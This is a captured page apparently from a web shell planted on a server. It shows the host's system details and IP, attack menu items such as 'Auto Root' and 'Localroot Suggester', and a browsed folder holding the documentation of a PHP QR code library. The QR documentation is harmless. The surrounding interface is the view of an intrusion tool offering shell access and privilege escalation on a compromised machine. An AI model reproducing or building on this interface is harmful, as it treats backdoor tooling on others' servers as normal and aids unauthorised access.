Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 3.16.24.18
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
3 /
werneckbh /
qr-code /
docs /
Delete
Unzip
Name
Size
Permission
Date
Action
_layouts
[ DIR ]
drwxr-xr-x
2018-02-04 09:00
assets
[ DIR ]
drwxr-xr-x
2018-02-04 09:00
examples
[ DIR ]
drwxr-xr-x
2018-02-04 09:00
_config.yml
177
B
-rw-r--r--
2018-02-04 09:00
index.md
2.13
KB
-rw-r--r--
2018-02-04 09:00
Save
Rename
### What is a QR Code? **_QR Code_** is short for **_Quick Response Code_**. It is a type of barcode that can store more information than the standard vertical lines barcode. <small>For a detailed explanation on QR Codes, please visit <a href="https://en.wikipedia.org/wiki/QR_code" target="_blank">https://en.wikipedia.org/wiki/QR_code</a></small> ### What does it look like? A QR Code is a squared image with seemingly random dots. It may look like this:  If you use your QR Code reader of choice, it should show you the message **QR Code Generator for PHP!** ### What is QR Code Generator for PHP? QR Code Generator for PHP is a standalone package for creating QR Codes in PHP. It does not depend on any external sources, like some other generators use <a href="https://developers.google.com/chart/infographics/docs/qr_codes" target="_blank">Google Graphs API</a>. It does, however, require PHP version **7.1** or higher. It supports the following formats: - Portable Network Graphics (PNG) - Scalable Vector Graphics (SVG) ### <a id="examples">Examples</a> - [Generic use](examples/generic-use) - [Calendar Event](examples/calendar-event) - [Email Message](examples/email-message) - [Phone](examples/phone) - [SMS](examples/sms) - [Text](examples/text) - [URL](examples/url) - [meCard](examples/me-card) - [vCard v3](examples/v-card) - [Wi-fi Network Settings](examples/wi-fi) ### Note Because of the number of permutations the QR Code permits, it is common to be able to generate different QR Code images for conveying the same information. Try scanning these codes:    --- QR Code Generator for PHP is [licensed](https://github.com/werneckbh/qr-code/blob/master/LICENSE.md) under <a href="https://tldrlegal.com/license/mit-license" target="_blank">MIT</a>.